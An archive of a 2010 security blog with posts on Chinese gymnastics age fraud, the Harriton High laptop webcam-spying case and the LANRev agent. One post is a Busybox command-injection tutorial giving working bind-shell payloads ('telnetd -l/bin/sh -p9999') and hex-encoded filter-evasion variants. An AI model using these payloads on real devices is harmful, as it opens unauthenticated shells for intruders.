Stryde Hax

Medals Delivered, Questions Unanswered

2010-08-12T11:36:00.000-07:00

Timeline, 2008

September 22nd, 2008 A video is released on this blog showing a translated interview with Olympian Yang Yun. The product of collaboration between myself, a volunteer translator and Heather Lawver, the video is a taped confession of age falsification in the Sydney Olympics; the final exhibit in a string of primary documents clearly demonstrating organized sporting fraud.

September 24th, 2008 The IOC expands its age falsification investigation to include the Sydney Olympics.

Today, the press is reporting the the result of the IOC's investigation: a medal presentation ceremony to the US Sydney gymnastics squad, bronze medals delivered a decade late.

It's a touching story and one I'm proud to be a part of. As I read the reporting surrounding the event, however, I continue to be perplexed by the version that is being put forward.

FIG [...] investigated whether underage gymnasts competed for China at the 2008 Summer Games in Beijing, but found no evidence of wrongdoing. As they pursued those claims last fall, officials decided to take another look at allegations surrounding the ages of two Chinese gymnasts from Sydney.
- The Washington Post

No evidence of wrongdoing? Certainly voluminous records of wrongdoing were published on this blog. But what did the FIG actually say? Perhaps the Washington Post should read this interview with the president of FIG:

Grandi said it was conceivable that China had cheated in Beijing"
"There was strong circumstantial evidence, certainly, but these investigations are not my job ... I'm not the police or Interpol
- Bruno Grandi, President, FIG

More incredible than the claim that the FIG "found no evidence" is the implicit assertion that the IOC/FIG started investigating on September 24th, 2008, because it was just the right day to start looking into fraud eight years later. I do not believe that the investigation was launched two days after we published the Yang Yun video simply out of coincidence. I will never believe this. To do so means that the risks and sacrifices made by the people within China who worked to leak information to me and other bloggers were meaningless. The truth is clear to anyone who reads this blog's archives and examines the documents presented: state sponsored sporting fraud was committed by the Chinese state in Sydney and in Beijing. The fraud was revealed due to the Chinese state's inability to control the compulsory transparency it forced onto its citizens. And the fraud was ignored due to the inability of the FIG & IOC to engage the expertise necessary to validate electronically obtained documents.

So if it's said nowhere else, let it be said here. To those who risked discovery, imprisonment, and worse to get this information to the world: Thank You. For my part, I did my best to represent you.

If you'd like to read the official Chinese response, try to access this link:
http://www.baidu.com/s?wd=cache:strydehax.blogspot.com
That URL is an attempt to retrieve this blog from the archives of the Chinese search engine Baidu. Visiting the link will result in a forcibly terminated connection via automated Internet censorship; you will simply receive a browser error. And that is the official response.
-stryde.hax

A Flurry of Spycam News

2010-04-17T16:14:00.000-07:00

New allegations abound regarding high school teachers spying on students. A drama teacher has now been arrested for hiding a camera in order to catch students undressing. His name was Larry Dibble, and it happened in Ohio, not Pennsylvania. Unfortunately I didn't find out from the news; instead, I found out from my alumni newsletter. As I follow this story I can't help wishing I'd had a chance to help; I think I had an above average shot at digging up the 1995 court case against Dibble in Minnesota. It's important to start out talking about Dibble, though, because I believe that when apologists speak about giving school officials unaccountable surveillance powers, they forget that people like Dibble exist. When we talk about trusting schools with the responsibility to choose when to activate spycams, it's important to understand that people like Dibble will be drawn to those positions of power. It's something I wish Henrico County was thinking about as they continue to deploy jailed laptops equipped with remote observation against their students.

The press is having a field day with the amazing allegations being made by the lawyer behind the PA lawsuit: thousands of pictures, pictures of students in partial states of undress, pictures of students sleeping, email exchanges between school administrators reveling in their powers of observation. What's important to remember about these allegations is that they're still allegations. Perhaps the lawyer is sharing part of the discovery process, or, perhaps the lawyer is trying to keep his case alive in the press. It's hard to say. But I believe it is extremely telling that the judge has issued an order against releasing the spycam photos following the publication at Philly.com of photos of Robbins sleeping, and the first school administrator to be questioned has pleaded the Fifth and refused to answer any questions. Meanwhile the school has apparently redacted its claim that the webcams were only activated 42 times, revising the estimate from 42 to "substantial" (presumably a number more than 42), and are individually notifying the families of children who appeared in laptop webcam photographs.

Maybe the allegations are true, maybe they're not. I will say that right now, the school's defense doesn't pass the smell test. If I was forced to bet, I'd bet that everything in the revised complaint is true. And truth be told, this shouldn't come as a surprise. This is the only logical outcome of distributing jailed devices equipped with surveillance hardware and legal barriers against owner observation.

If you can't see the parallels between this case and 1984 being digitally wiped from millions of jailed ebook readers, if you can't see the connection to criminally enforced consumer lockout using the DMCA, then you're not paying attention. There's a reason Apple is filing legal briefs alleging that jailbreaking is terrorism. Anything that keeps the consumer out of their own devices helps to remove pesky questions like the ones being asked right now in Pennsylvania. Blind, restricted consumers are good for business; free citizens create problems. Many read these arguments and believe that because people are still openly jailbreaking, it doesn't matter if it's illegal. Of course, it's only a problem of scale. The Department of Homeland Security is busy arresting people for breaking into devices they own. The only reason iPhone jailbreakers aren't going to federal prison is that there are more of them than the prison system can handle, a situation we shouldn't expect to last. Don't be fooled; this war is only getting started.

-stryde.hax

Webcam Activation Illegal?

2010-03-21T18:46:00.000-07:00

I wanted to briefly mention the great follow-up reporting going on at Philly.com on the Harriton High spycam case. This article contains so much great detail and investigative reporting that to summarize it here wouldn't do it justice; if you're following this case, I encourage you to read the whole thing. I wanted to briefly call out one detail, however. There's been a lot of commentary on this blog to the effect that the school might have been within its legal boundaries when activating webcams remotely for the purpose of theft tracking. Not being a lawyer, I've been hesitant to render a legal opinion. However, I find this quote telling:

Joseph Daly, who retired in 2009 as Lower Merion police superintendent, said he never knew that his department was being furnished with pictures snapped from students' laptops.

"God, no, I don't remember that," he said when told about it. "That's illegal as hell."

Well then. Unless he's been grossly misquoted, I believe we have an expert opinion at last.

-stryde.hax

Where Have All the Hackers Gone?

2010-03-18T18:27:00.000-07:00

Recently a high school in Pennsylvania shocked the nation when it became the subject of a lawsuit alleging that webcams in school-issued laptop computers were being remotely activated by school staff, used to snap photos of students in their homes. As a computer security professional I dug into the story with the help of my colleagues, and together we found that the networked webcam capability built into these computers by the school district was absolutely real. Our findings were greeted with surprise and dismay; they have caused a nationwide outcry. The truth is, this shouldn't have been a surprise. America has been on this road for years.

Nearly every wired school district in America uses some form of remote administration software. This software varies in the degree of control that it exerts over student computers. The trend started with web filtering and progressed to allow remote use of student's desktops by teachers. Some advanced schools now allow surreptitious eavesdropping of student's desktops while they are working. Today on the cutting edge of this trend is Harriton High, with thousands of taxpayer purchased laptops issued to children, and school staff armed with the ability to take remote webcam pictures of the students at will. This isn't a revolution, it's just a bump on the ride.

Historian James Bradley writes in FlyBoys about a nation of young men growing up in pre-WWII America tinkering, modifying, and optimizing a new wave of internal combustion powered machines. Bradley talks about the inherent advantage that this generation of tinkers gave America in the coming aerial conflict, where pushing new technology to its limits was the key to a new form of warfare: aerial combat. When it comes to information technology, it's time we ask ourselves: where will we find our next generation of computing tinkers? This problem is only now becoming apparent at a national level. The US Air Force is currently holding Cyber Defense competitions at the high school level, nationwide. The Defense Advanced Research Projects Agency (DARPA) recently released a paper stating that the United States will be “hampered” by its projected dearth of expertise in Internet technologies and information security: “we are steadily losing the engineering talent to project these systems .” As our government begins to identify a critical shortage that has been evident in my industry for years as a national security threat, I believe it is time we asked ourselves: “Where have all the hackers gone?”

The answer is that we've stopped making them. Before building Apple Computer, Jobs & Wozniak hacked the phone system. I grew up hacking the computer they built, the Apple ][. Critical events in my personal and professional development were dependent on my ability to access the core of how computers worked in order to understand them, re-purpose them, and harness them to my will. The Greatest Generation supercharged their Chevys; my generation peeked and poked at the internal memory of our Apple computers. Today's generation is growing up in a new era of “jailed” devices, devices like the laptops at Harriton, which were jailed against any student use except approved applications. To tinker with these computers, students were first required to “jailbreak”, a technical feat which would have given students the freedom to understand their computers and to determine who was remotely activating their webcams. Not surprisingly, jailbreaking carried the threat of stringent penalties from the school. A student locked inside a digital jail of this type could never start down the road of digital proficiency necessary to reach the finish line DARPA is asking for.

Digital jails are not solely the realm of education. Devices like the Amazon Kindle and Apple iPhone are jailed against any unauthorized consumer use, guarded by strict but unproven new federal laws against jailbreaking them. Jailed devices are controlled by a networked authority, be it a company like Apple, a school district, an employer, or a government. Jailed devices teach a different kind of lesson to the people who use them: your camera may be monitored, your books may be deleted, your work process may be watched. And most importantly, your attempts to delve into the mysteries of how the device functions will be punished.

We've reached a fork in the road at Harriton High. As the nation watches, we're pondering the consequences of transforming computing devices from machines that we control into machines which exert control over us. As we give away our freedom to tinker, we give away the chance to raise a generation which will lead the information age. It is now time to decide as consumers, as parents, and as a nation which road we will take into the future. I believe that students cannot learn to protect themselves against Internet threats unless they are taught that the power of the Internet comes with a price tag to be paid in responsibility. The responsibility to learn, understand, and master digital self defense. The responsibility to peer inside the machine in order to master it. In order to take on this responsibility, we need to loosen our grip on the reigns and let our children show us the way.

-stryde.hax

Busybox Command Injection

2010-03-11T08:00:00.000-08:00

Linux Inside

The number of Linux-powered devices on the market is exploding. As this CCC paper points out, Linux is finding its way into everything - GPS units, television set tops, phones, routers, the works. That leaves a lot of hacking to be done, and this last month I got to spend some time with Intrepidus jailbreaking and exploiting some embedded devices. One big surprise I encountered was the difficulty of landing even simple command-injection vulnerabilities on embedded Linux.

I can't believe it's not Linux

The big problem with a lot of embedded Linux devices is they're not really running Linux. If you haven't heard of Busybox before, it's the core functionality of Linux condensed into a single multi-call binary. Busybox offers embedded device developers a simple distribution of Linux without the large filesize footprint and complexity of porting a full Linux toolchain to embedded hardware. From a hacker's perspective, an embedded Busybox install can pose some unique challenges, especially if you're throwing your exploit "blind", without the ability to see error messages:

busybox's ash shell lacks the full functionality of bash and other shells

busybox's available functionality depends on compile options chosen by the developers, so every device has the potential to pose unique challenges

busybox's implementation of most commands has slightly different functionality and different command line flags than the corresponding Linux versions

Standard pipe-redirect callback shells often fail; in fact, I've never gotten a standard two-window "telnet | ash | telnet" shell to work on busybox.

What's Command Injection?

Command injection vulnerabilities are usually some of the simplest exploits to land, requiring no assembly and only a little shell knowledge. They can occur whenever developers use user-supplied data as an argument to a shell command. This can happen in a number of ways, and writing a complete reference on all the ways this type of bug can manifest itself is a large topic; OWASP has a good writeup on programmatic (system call) command injection. This writeup isn't about how injection works; it's about how you can exploit injection on busybox. Here's where things get weird.


busybox sh


BusyBox v1.1.3 Built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ $ ping 127.0.0.1
ping: permission denied. (are you root?)

Busybox isn't quite Linux! If you are attempting to find or exploit a "blind" command injection vuln and the target process is not a superuser process, using ping to "beacon" out to your attack box won't work, because on busybox ping requires superuser privs. Telnet is a better beacon choice, as it is part of the default build process and must be manually removed.

Chaining Commands: Nothing New Here

The basics of adding execution to an input argument don't change much with busybox's shell:


~ $ true;echo Execution
Execution
~ $ false;echo Execution
Execution
~ $ true|echo Execution 
Execution
~ $ false|echo Execution
Execution
~ $ false||echo Execution
Execution
~ $ true&&echo Execution 
Execution
~ $ echo `echo Execution`
Execution
~ $ echo $(echo Execution)
Execution

Getting Access

The absolute easiest way to try to get access to a busybox install via command injection is telnetd. Busybox's telnetd is different: on a normal telnetd install the "-l" flag enables line mode, but on busybox, -l specifies the command to use to challenge the user. That means if you specify the busybox shell, you get a shell without a user/pass prompt:


telnetd -l/bin/sh

That's the shortest possible string that can land a shell on a busybox system. Of course, here's where things get tricky. If telnet is already open, this will fail; it will also fail to bind a priveleged port when run as a non-root user. Finally, if the environment does not contain a valid path value, the command will fail.


/bin/busybox telnetd -l/bin/sh -p9999

The command above will bind a telnet shell to port 9999 without a path value and without running as root. Of course, now things get difficult.

Restrictions

Sample exploit conditions are always easy to land and never have anything annoying in the way like character filters or buffer lengths. The real world is different; exploitation often requires circumventing limitations. As far as length goes, the commands above pretty much cover the shortest possible exploit strings. Character set limitations are a different story. Embedded device character set limitations can be pretty heavy duty, enforced by on-screen-keyboards, security character filters, and other methods. A common limitation is space-bounded copy, generated by a tokenizer which clips a supplied argument to everything up to the first instance of whitespace. Here are some ways to work around these limitations:


~ $ echo -e \\x7c\\x7c\\x2e
||.
~ $ printf \\x7c\\x2e\\x0a
|.

Busybox supports evaluation of slash-escaped characters both using echo and the shell builtin printf. This can be used to encode a lot of the characters that are often stripped. Different execution methods require different levels of escaping. Here are some combinations that work; note that I have included the command "true" to show where a successful system command would lie in the overall exploit.


true|/bin/busybox telnetd -l/bin/sh -p9999
# Character set required: -/

true|eval $(printf telnetd\\x20\\x2dl\\x2fbin\\x2fsh\\x20\\x2dp9999)
# Character set required: $()\ 

true|eval `printf telnetd\\\\x20\\\\x2dl\\\\x2fbin\\\\x2fsh\\\\x20\\\\x2dp9999`
# Character set required: `\

If you're attempting to jailbreak a potential busybox device, and you're fuzzing a net-facing service, the strings above coupled with a good [&& / || / | / ; / $() / ``] regular expression should get you started; just monitor port 9999. If you manage to land on a device with the methods I've listed here, drop me a line and let me know how it went down. If you're determined to drop a binary on the device a few bytes at a time, this should get you started:


eval echo -n $(echo -e -n \\xde\\xad\\xbe\\xef $(printf \\x3e\\x3e\\x2ftmp\\x2fig))

Notes on Other Exploit Methods

There are plenty of ways to get onto a Unix-based system like busybox other than binding a shell, however often embedded devices have unique restrictions. Concatenating a user you control to /etc/passwd can silently fail on a readonly filesystem, a very common occurrence on embedded devices. Concatenating binaries from the shell requires precise knowledge of the architecture target type. And when you're jailbreaking, failure is almost universally silent. Good luck,

-stryde.hax

Schools Systems Weigh Benefits of Child Porn Roulette

2010-03-03T16:02:00.001-08:00

To Catch a Thief (Naked?)

The story of remotely activated webcams in school laptop programs appears to be a nationwide phenomenon. The media outcry over Harriton High appears to have completely missed the fact that an even larger 1:1 educational laptop program has been using webcams for theft tracking for years as well. This great survey reporting from Philly.com shows a wide ranging reaction from school officials regarding remote laptop activation, from those that get it, to those who don't, those that are quietly deleting their webcam access, and those who... wait, huh, what?

"I didn't even know a computer has the ability to do that"
- Dan Domenech, Executive Director of the American Association of School Administrators

"We had discussed it, but decided not to touch it with a 10-foot pole. ... What if it accidentally started taking pictures? ... You could have an 11-year-old child who steps out of the shower and is toweling off. You could have child pornography. ... Everything is about risk - the risk of losing a device vs. the disaster that can occur ... I would rather lose a computer than hurt a child."
- Jeff Mao, Maine Department of Education

"the McCracken County, Ky., school district began removing tracking software from laptop computers assigned to high school students. Technicians are deleting software that allows access to Web cams and monitors usage on 2,170 laptops"

"In the Henrico County, Va., public schools, which also have a large laptop program, the remotely operated Web cams are disengaged until a computer is stolen. About 26,000 laptops have been issued to students"

You read that right. Harriton is just the tip of the iceberg. Henrico County has been activating their laptop webcams too, and by their admitted numbers, more often than Harriton High:

"Henrico schools spokesman Mychael Dickerson said yesterday that the system has remotely activated cameras 50 times in the past three years to locate computers stolen from elementary schools. Those computers do not go home with students. Of those, 20 have been recovered. The other cases still are under investigation, he said."

Putting aside the amazingly low success ratio apparently quoted above, this means that yet another school district is opting to take pictures of "We'll Find Out What" when laptops go missing. Or as Jeff Mao so eloquently alludes to, they're playing Child Porn Roulette and betting to win in order to find laptops. Unfortunately the ACLU has waded into the fray, armed with all kinds of crazy ideas like "search warrants" and "wiretaps", acting like a total buzzkill and basically spewing common sense everywhere:

"In May of 2009, NBC12 reported the theft of several laptops from Pinchbeck Elementary School. School officials used the police report number -not a warrant- to activate a camera which clearly revealed the suspect, who was arrested a week later, and eventually pled guilty. Now, the ACLU claims that could be an illegal invasion of one's privacy...even that, of a thief."

My personal favorite part of this article is the reporter's shocked tone at the idea that accused criminals have rights. But it's important to note that a warrant was never issued for this search. And that brings me to a really important question regarding search warrants, and their eventual use in programs like this. How does one fill out a webcam search warrant?

We're Going to Search... Something!

If you take a look at the top of the form, you'll see "Name, Address ... premises to be searched". This has always been a part of search warrant forms. With the way webcam theft tracking works, we'll need a new type of search warrant: Location To Be Determined After Search. When these laptops wake up and retrieve orders to activate their webcams, they can literally be anywhere. They can be in a child's bedroom, in a foreign embassy, in a conference room in the hands of someone who inadvertently purchased a hot laptop off Ebay, in a SCIF, or anywhere else in the world. And so, we will need to be able to write search warrants that are valid anywhere on the planet. Or, just maybe, that's impossible, and the process of having to get a search warrant in the first place will reveal how truly ludicrous this entire scheme really is. For now, that quiet whirring sound is the sound of administrators across the country deleting their webcam folder.

-stryde.hax

PostScript: "For this school district to develop police powers in secret and then exercise those powers in secret is problematic and disturbing"
-Lillie Coney, EPIC

FIG Revokes Chinese Gymnastics Medal

2010-02-27T18:57:00.000-08:00

I Did My Best

When I meet people in computer security circles or at conferences and I'm identified as Stryde, the Olympic story comes up pretty often, and the comment I seem to get the most is "how did you let them get away with it?" I've never understood this sentiment, the idea that I somehow have more power than a Publish button on Blogger, and I often counter with "Well I was going to launch an airstrike but I reconsidered." Little did I know, the president of the International Gymnastics Federation (FIG), Bruno Grandi, has been using the same joke.

From This interview:
"Grandi said it was conceivable that China had cheated in Beijing"
"There was strong circumstantial evidence, certainly, but these investigations are not my job ... I'm not the police or Interpol. If I find that there was cheating, then I can act." ... "I had everything sent to the IOC and the IOC has carried out its investigations and the figures were the same ... The IOC gave us its findings, and we checked them and there was nothing. When people on the Internet find fake documents, you need to legally prove that these are fake, and that's not my job. I have to respect the documents that the Chinese government gives me. What else should I do - declare war on China?"

Putting aside for a moment the "fake documents" phrase, and assuming for a moment that Grandi does not understand that the documents I linked to were hosted by the Chinese government itself, verifiably, for years, the most important part of that interview is the last phrase. Grandi's process, and the IOC's process, requires them to trust documents that are provided to them by governments. This is a great process for finding athletes that are cheating, and a totally failed process for finding governments that are cheating. What justice system would make the defendant an authority on his own guilt? Only the IOC and the FIG.

As Grandi says, a fact-finding authority with the power to prosecute a government for fraud was never involved. The servers from which the world watched the Chinese government censor the truth in real time were never seized and forensically analyzed. No one was ever caught or prosecuted for deleting any of the primary documents off of Chinese government web servers as age records vanished one by one under our watching eyes. And the reason for this is that the FIG by their own admission are not empowered to question governments. So when we say that the Chinese gymnasts were cleared by the FIG, we need to be very clear about what that actually means: not much.

A Confession Is Not Enough

About a week after the translated Yang Yun video created by myself and Heather Lawver was posted, the FIG re-opened their investigation into Chinese gymnasts competing in the Sydney Olympics. Yesterday, as an alert reader pointed out, the FIG revoked the Bronze medal awarded to Dong Fangxiao in Sydney, due to paper evidence they managed to find of her employment under her real age. The Chinese government immediately responded, claiming "there is no problem in Dong Fangxiao's age." What's interesting is that the FIG did not revoke the medal of Yang Yun, who is seen here confessing on state television to competing under age. It is important to note that for the FIG, a videotaped confession was not sufficient evidence. So, to summarize:

The FIG is by their own admission not authorized to investigate governments for fraud

The documents I identified implicate the government as having committed fraud

The removal of every single linked document from government web servers indicates fraud

A videotaped confession is considered insufficient proof

Despite all these limitations, the Chinese have still lost a medal for age falsification

Readers are welcome to examine my archives and what evidence is left and make their own conclusions. I haven't written about this since it happened because I felt it became a sports story and not a technology story, and the technology story I was interested in was becoming lost in the noise. I wanted to talk about document permanence, transparency, and the amazing impact both were having on our culture. Fox News just wanted me to say that someone was cheating. In the end, as the FIG prepares to take a medal back, I will say only this: I stand by the integrity of my findings.

- stryde.hax

Network Fingerprint for LANRev Agent

2010-02-22T17:20:00.000-08:00

Analysis of the LANRev software used to spy at Harriton High continues; for now, I wanted to give everyone a way to detect if a machine has the software installed this won't tell if its webcam features are active. You'll need a Unix command line with the "netcat" utility installed. Then, paste in the command below, but use the IP address of the computer you'd like to check instead of the one in the example (10.0.7.22).


/bin/echo -e "\\x01\\x00\\x03\\x00\\x00\\x00\\x00\\x00
\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff
\\xff\\xff\\xff" | nc -v -v -v  10.0.7.22 3970

strydes-Mac-mini.local [10.0.1.111] 3970 (?) open
00000000  01 00 00 03 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000010  00 00 01

Above, you can see the 19 bytes you will receive in response if the computer in question is has LANRev. Additional bytes will follow, up to 272 total bytes, but those are subject to encryption so I cannot predict them. The above fingerprint is enough. I've submitted a fingerprint to the Nmap fingerprint database, but until that goes through, the above should suffice. Good luck!
-stryde.hax

update 2/28/2010 10:15am

Is it spyware? Well, [Sunbelt AntiVirus] [Philly.com] [New Jersey Star-Ledger] [Pueblo Chieftan] [Cory Doctorow] [Karl Denninger] [Mark Kosur].

update

LANRev says they're removing the webcam functionality, so in response, I've made some edits to this post. I want to be make sure folks know that this test doesn't verify webcam activation functionality.

The Spy at Harriton High

2010-02-21T14:21:00.001-08:00

This investigation into the remote spying allegedly being conducted against students at Lower Merion represents an attempt to find proof of spying and a look into the toolchain used to accomplish spying. Taking a look at the LMSD Staff List, Mike Perbix is listed as a Network Tech at LMSD. Mr. Perbix has a large online web forum footprint as well as a personal blog, and a lot of his posts, attributed to his role at Lower Merion, provide insight into the tools, methods, and capabilities deployed against students at LMSD. Of the three network techs employed at LMSD, Mr. Perbix appears to have been the mastermind behind a massive, highly effective digital panopticon.

PanoMasterMind

The primary piece of evidence, already being reported on by a Fox affiliate, is this amazing promotional webcast for a remote monitoring product named LANRev. In it, Mike Perbix identifies himself as a high school network tech, and then speaks at length about using the track-and-monitor features of LanRev to take surreptitious remote pictures through a high school laptop webcam. A note of particular pride is evident in his voice when he talks about finding a way outside of LANRev to enable "curtain mode", a special remote administration mode that makes remote control of a laptop invisible to the victim. Listen at 35:47, when he says:

"you're controlling someone's machine, you don't want them to know what you're doing"
-Mike Perbix

It isn't until 37 minutes into the video till Perbix begins talking about the Theft Tracking feature, which causes the laptop to go into a mode where it beacons its location and silent webcam screenshots out to an Internet server controlled by the school.

Click to watch an excerpt of Mike Perbix's spycast

The beacon feature appears to have been one of the primary methods for remote spying, however, network footprints abound over the details and architecture of the remote administration effort. In this post, Perbix discusses methods for remotely resetting the firmware lockout used to prevent jailbreaking of student laptops. A jailbreak would have allowed students to monitor their own webcam to determine if administrators were truly taking pictures or if, as the school administration claimed, the blinking webcams were just "a glitch."

Perbix also maintains a prolific blog, where in this blog post he describes using the remote monitoring feature to locate a stolen laptop:

"As a prime example, we initially attempted to recover a stolen laptop that reported back to us it's internet address and DNS name. The police went to the house and were befuddled to find out the people we knew had the laptop was not the family that lived there...well, we eventually found out that they were the neighboring house and were borrowing the unsecured WI-FI."

In a September 2009 post that may come to haunt this investigation, Perbix posted a scripting method for remote enable/disable of the iSight camera in the laptops. This post makes a lot more sense when Perbix puts it in context on an admin newsgroup, in a post which makes it clear that his script allows for the camera to appear shut down to user applications such as Photo Booth but still function via remote administration:

"what this does is prevent internal use of the iSight, but some utilities might still work (for instance an external application using it for Theft tracking"

What's the purpose of shutting down a camera for the user of the laptop but still making it available to network administrators? Ask yourself: if you wanted to convince someone that a webcam blinking was a glitch, would disabling the cameras help make your case?

We Found the Glitch, Mrs. Buttle

The truly amazing part of this story is what's coming out from comments from the students themselves. Some of the interesting points:

Possession of a monitored Macbook was required for classes

Possession of an unmonitored personal computer was forbidden and would be confiscated

Disabling the camera was impossible

Jailbreaking a school laptop in order to secure it or monitor it against intrusion was an offense which merited expulsion

When I spoke at MIT about the wealth of electronic evidence I came across regarding Chinese gymnasts, I used the phrase "compulsory transparency". I never thought I would be using the phrase to describe America, especially so soon, but that appears to be exactly the case. On a familiar note, the authorities are denying everything. As one reads comments on this story, a consistent story begins to emerge:

"My name is Manuel Tebas. I was a student at Harriton High School, in the graduating class of 2009. We were the first year on the one-to-one laptop initiative. [...] I saw your post about removing webcam capability from the Macbook. It is possible - I did it last year. I will preface this by saying that when I did it, I was almost expelled, saved only by the fact that there was, at the time, no rule against doing so."

"I remember that the laptop was a requirement in school for many classes. That may remain so."

" had brought in my own personal computer to work on a project for school one day. I was doing a presentation involving programs not available on the regular computers, only in specific labs. I happened to have a copy of my own. My personal property was confiscated from me in a study hall when I was working on a school assignment because it was against the schools 'code of conduct'."

"Hi, I'm a 2009 Graduate of Harriton Highschool. [...] I and a few of my fellow peers were suspicious of this sort of activity when we first received the laptops. The light next to the web cam would randomly come on, whether we were in class, in study hall or at home minding our own business. We reported it multiple times, each time getting the response: "It's only a malfunction. if you'd like we'll look into it and give you a loaner computer."

"The webcam couldn't be disabled due through tough tough security settings. Occasionally we would notice that the green light was on from time to time but we just figured that it was glitching out as some macbooks do sometimes. Some few covered it up with tape and post its because they thought the IT guys were watching them. I always thought they were crazy and that the district, one of the more respectable ones within the state, would never pull some shit like this. I guess I was wrong."

"I am the father of a 17 y/o Harrington High student. She has had one of these laptops for 2 years. She has noticed the "green light" coming on but was not computer literate enough to know what initiated it"

Browse as many web forums as you like, the comments above are highly representative. Students were told green webcam activation lights going off at home were a glitch, were required to use a jailed computer, were threatened with expulsion if they attempted to jailbreak the computer to find the truth, and were not allowed to use computers they controlled.

Inside LANRev

With some of my colleagues, I began a reverse engineering effort against LANRev in order to determine the nature of the threat and possible countermeasures. Some of the things we found at first left us aghast as security pros: the spyware "client" (they call it an agent) binds to the server permanently without using authentication or key distribution. Find an unbound agent on your network with Bonjour, click on it, you own it. The server software, with an externally facing Internet port... runs as root. I'm not kidding. For those unfamiliar with the principle of least privilege- this is an indicator of a highly unskilled design. Unfortunately, when we got down to basic forensics, LANRev appears to cover its tracks well. Here's a screenshot of the server application monitoring a tracked host:

Tracking intervals available at the top; screenshots and webcam shots in the lower right pane. No webcam shot is visible here as a webcam was not connected during testing

In order to spy on my computer, I had to mark it for spying. The icon for spying is a detective hat and a magnifying glass; very Sherlock Holmes

Once I had the agent installed, I used dtrace to monitor its activity as it hung around and spied on my system. The log below is an edited trace of the agents activity during a spy interval. It uses a fixed dump point, /tmp/Image, as its save file before uploading to the server, sadly this is wiped. Only a full forensics scan which picks up deleted files will have a chance of picking up the history of the spying on a particular computer. On laptops with a webcam, a second fixed save point, /tmp/Image1, is used to save the webcam pic.

For the technically inclined, I've highlighted some of the key points, use of the system screengrabber, the use of RawCamera, the fixed save point, etc. We're still working on our technical writeup of this software and hope to update soon.

During our testing, we infected a laptop with LANRev, then closed the lid, hoping to activate the LANRev feature which takes a webcam picture when the computer wakes. As my colleague Aaron opened the lid of his Mac, the green webcam light flickered, ever so briefly. It wasn't a glitch. It was a highly sophisticated remote spy in his system. And even though he was in control, the effect was still very creepy.

Here's one last capture from the Windows version of the administration console, showing a forced remote webcam snapshot. We've pixellated this, but rest assured the real thing looks very detailed

In other news on the case, subpoenas have been issued, the FBI is on the case, the candy in question has been caught red-fingered, and some enterprising chap is ready to cash in with a t-shirt. Doug Muth's hands on screenshots provide the best first hand encounter with the client end of the spyware in question. What amazes me most is that the family and lawyer filing the suit appear to have done no digital forensics going in, and no enterprising student hacker ever jailbroke a laptop and proved this was going on. The greatest threat to this investigation now is the possibility that the highly trained technical staff at LMSD could issue a LANRev script to wipe digital forensic evidence off all the laptops. This is why it is imperative for affected parents to have the hard drive removed from their children's laptops and digitally imaged before the laptop is connected to a network. With enough persistence, and enough luck, we may eventually learn the truth.

-stryde.hax

update 3/31/2010 8:00pm

Harriton is just the tip of the iceberg!

update 2/25/2010 11:00pm

I have a question about this case I haven't seen answered to my satisfaction anywhere. I believe it is possible, even likely, that the webcams were only activated on stolen laptops. A persistent contingent of commenters have no problem and see no 4th amendment issue with a state agency, such as a school, activating a webcam remotely to locate a laptop thief. Even if that thief is a child. Even if the thief is a child at home in their bedroom. Even if that thief is changing clothes? Read the argument made here. Comments? Thoughts? Expert feedback?

update 2/23/2010 6:00pm

If you haven't already, you must watch this PBS Documentary - How Google Saved a School. At five minutes in, you can see all these same features in use, in a school setting, by a principal. Remote surreptitious observation. Remote camera use. All used by a principal to observe kids and make sure they're working. There are a lot of school districts, administrators, IT professionals, and security professionals who see nothing wrong with this documentary. They see remote administration software in use in this way and they don't think it's wrong, and they don't think it's spyware. Some of them even believe that the extension of this functionality into the home doesn't make it spyware, or even wrong. But this is my personal blog, and it's my personal opinion that they're wrong. As an expecting parent, I don't ever want my kids on the business end of Remote Desktop Curtain Mode, even at school. I'm a security professional, and a big part of my education and my professional development was tinkering and tearing apart computer systems to gain understanding, learn how they work, and change their use. I believe that computer security is knowledge in practice; it's using your knowledge to protect yourself. These kids are learning that security is something that happens to you. That's backwards. DARPA thinks we're not raising a generation with applicable security skills. I think they're right; I think this is a recipe for the next generation of phishing victims. I'd like to see a school system where a kid can bring in x64 Ubuntu or Haiku OS that he secured him/herself. I'd like to see a school system where kids teach each other how to defend against remote webcam use. Instead, we've got kids who can't run Terminal. Not my kids.

update 2/23/2010 4:12pm

A note for anyone wishing to contact me privately: if you'd like me to write back, please leave a return email. My email is still stryde dot blog at gmail dot com.
It's Not Spyware!!!
I've received a lot of positive feedback about this entry; however, if there's one consistent complaint amongst my detractors, it's my classification of LANRev as spyware. So here is my response. Confusing remote admin software with spyware has a long history stretching back to Cult of the Dead Cow's first Bo2k release. I'm not as funny as them so I don't even try. It's true however that remote administration tools and spyware exist on the same spectrum, just ask the guys at Spectresoft. Spyware authors and remote admin authors often have to solve the same problems, like bypassing OS protections and getting around antivirus. It's a transition that's easily made. So where's the dividing line? The line is basically in how its used. Remote admin usually solves constructive tasks, like remote patch management, inventory location tracking, remote software installation. And sometimes it means screensharing in order to solve problems. I personally have sat at home as a network tech worked on my corporate laptop over a VPN. No problem. My personal opinion is this: when you see a piece of software with dedicated functionality for taking webcam screenshots surreptitiously and removing the evidence on disk, to me that's crossed the line into spyware. I'm certain that others in the industry will disagree with me. That's fine; let's have the debate. I don't mind losing a technical argument, as long as it's on merit.

update 2/23/2010 11:28am

My colleague Aaron pointed out to me today that the reason LANRev is using the raw camera device is that Apple implemented security measures to prevent remote activation of the webcam in OSX. LANRev was designed to bypass this security measure. Those who disagree with my spyware assessment, ask yourself, "what kind of software bypasses OS security measures?"
On the topic of whether or not we yet have proof of illegal use, I would ask you to listen carefully to the webcast, and listen for the word "house" at 1:28. Listen for "yes we have used it."

update 2/23/2010 10:00am

